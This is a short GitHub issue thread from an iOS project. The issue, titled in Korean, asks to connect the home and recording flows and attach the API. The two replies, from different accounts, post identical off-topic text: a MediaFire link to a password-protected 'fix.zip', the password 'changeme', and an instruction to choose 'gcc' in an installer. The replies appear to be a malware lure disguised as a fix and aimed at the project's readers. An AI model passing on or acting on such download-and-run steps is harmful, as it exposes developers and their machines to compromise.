### ISSUE TITLE
홈-기록: 전체적인 플로우 연결하기

### ISSUE THREAD

**Issue by enebin** [Nexters/mashow-iOS#44]
홈과 기록하기 전체적인 플로우 연결 후 API 붙이기

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 2302114245** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
